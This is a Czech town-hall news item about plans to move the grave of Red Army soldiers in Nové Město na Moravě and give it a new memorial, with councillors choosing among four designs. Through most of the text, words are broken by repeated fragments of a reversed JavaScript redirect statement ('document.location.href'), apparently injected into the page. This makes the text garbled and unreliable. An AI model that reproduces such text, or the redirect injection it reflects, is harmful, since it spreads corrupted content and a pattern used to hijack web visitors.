Rainbow page separator

O podobě pomníku rudoarmějcům rozhodnou zastupitelé v prosinci

Pátek, 24. listopadu 2017

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / V květnu 2020 dojde k odhalení nového náhrobku vojákům Rudé armády, kteří v posledních válečných dnech padli při osvobozování Nového Města a jeho okolí a jsou pochováni na tamním ka[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolickém hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově. „V roce 2020 oslavíme 75. výročí konce druhé svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové války a myslím, že je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dobrá příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost, abychom si připomněli její oběti,“ uvedl starosta Nového Města Michal Šmarda.
Novoměstská radnice má již k dispozici čtyři návrhy od regionálních výtvarníků, které nastiňují, jak by nový pomník mohl vypadat. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to návrhy jsou rovněž k prohlédnutí na webu města, o konečné podobě rozhodnou zastupitelé při svém prosincovém zasedání.
Hrob rudoarmějců, na jehož novém náhrobku budou podle přání ruské strany dvojjazyčně uvedená jména pohřbených a rovněž symbol pěticípé hvězdy, která má lépe vystihovat mnohonárodnostní složení Rudé armády než původně navrhovaný pravoslavný kříž, se přemístí blíže k hlavnímu vchodu hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova. Náklady na nové pietní mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nepřesáhnou půl milionu korun, přičemž se na nich má podílet také ministerstvo obrany.